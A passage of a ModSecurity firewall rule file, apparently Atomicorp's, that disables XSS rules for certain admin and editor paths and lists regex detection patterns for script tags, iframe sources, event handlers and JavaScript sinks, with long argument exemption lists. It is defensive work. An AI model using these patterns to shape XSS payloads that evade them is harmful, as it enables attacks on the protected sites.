SecRule REQUEST_FILENAME "/tiny_mce/themes/advanced/source_editor\.htm" "phase:2,id:91446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admincp/automediaembed_admin\.php" "phase:2,id:91447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:91448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/compose\.php" "phase:2,id:91449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/cgi-bin/database/admin\.pl" "phase:2,id:91450,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91451,t:none,pass,nolog,skipAfter:END_RULES_91451"


SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/note/|!ARGS:/summary/|!ARGS:section|!ARGS:/xml/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340818,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
SecRule ARGS "!(^(submit\+>>|>>)$)"


SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:section|!ARGS:/note/|!ARGS:/summary/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,chain,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340819,rev:22,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
SecRule ARGS "!(^(submit\+>>|>>)$)" "t:none,t:lowercase"

# XSS injection
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:footnote|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:Submit|!ARGS:comment|!ARGS:/message/|!ARGS:formSubmit|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340820,rev:18,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
SecRule ARGS "!(^(submit\+>>|>>)$)"


SecMarker END_RULES_91451

SecRule REQUEST_FILENAME "/cynghrair/change\.php" "phase:2,id:91452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/adm_noticies\.php" "phase:2,id:91453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/plugins/ctrt/index\.php" "phase:2,id:91454,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91455,t:none,pass,nolog,skipAfter:END_RULES_91455"


SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340821,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/^descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:comment|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340822,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

# XSS injection
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:log|!ARGS:process_login|!ARGS:message|!ARGS:oldmsg|!ARGS:t_cont|!ARGS:footnote|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:/^descr/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:Submit|!ARGS:comment|!ARGS:/message/|!ARGS:formSubmit|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"

SecMarker END_RULES_91455

SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/install1\.php" "phase:2,id:91457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:91458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admincp/" "phase:2,id:91459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"

SecRule REQUEST_FILENAME "/admincp/css\.php" "phase:2,id:91460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/modules/upl/wc/csxml\.php" "phase:2,id:91461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/onmouseover\.js" "phase:2,id:91462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admincp/vbacmps_install\.php" "phase:2,id:91463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/manage/bios/edit/" "phase:2,id:91464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/manage/index\.php" "phase:2,id:91465,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91466,t:none,pass,nolog,skipAfter:END_RULES_91466"


# Rule 340147: Generic XSS filter
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/description/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:email_id|!ARGS:obj_itop|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/quote/|!ARGS:/print/|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:htmlEntityDecode,t:lowercase,capture,id:360678,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',chain,logdata:'%{TX.0}'"
SecRule ARGS "!(^(submit\+>>|>>)$)"

# Rule 340148:  XSS injection with multimatch checks
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/description/|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:pay_inst_1|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:/quote/|!ARGS:/print/|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,status:403,log,auditlog,chain,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:360679,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',multiMatch"
SecRule ARGS "!(^(submit\+>>|>>)$)" "t:none,t:lowercase"
# Rule 340149:  XSS injection
SecRule REQUEST_URI|ARGS|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:/description/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/^jform/|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:login_form|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:/quote/|!ARGS:paepdc|!ARGS:/quote/|!ARGS:/print/|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= 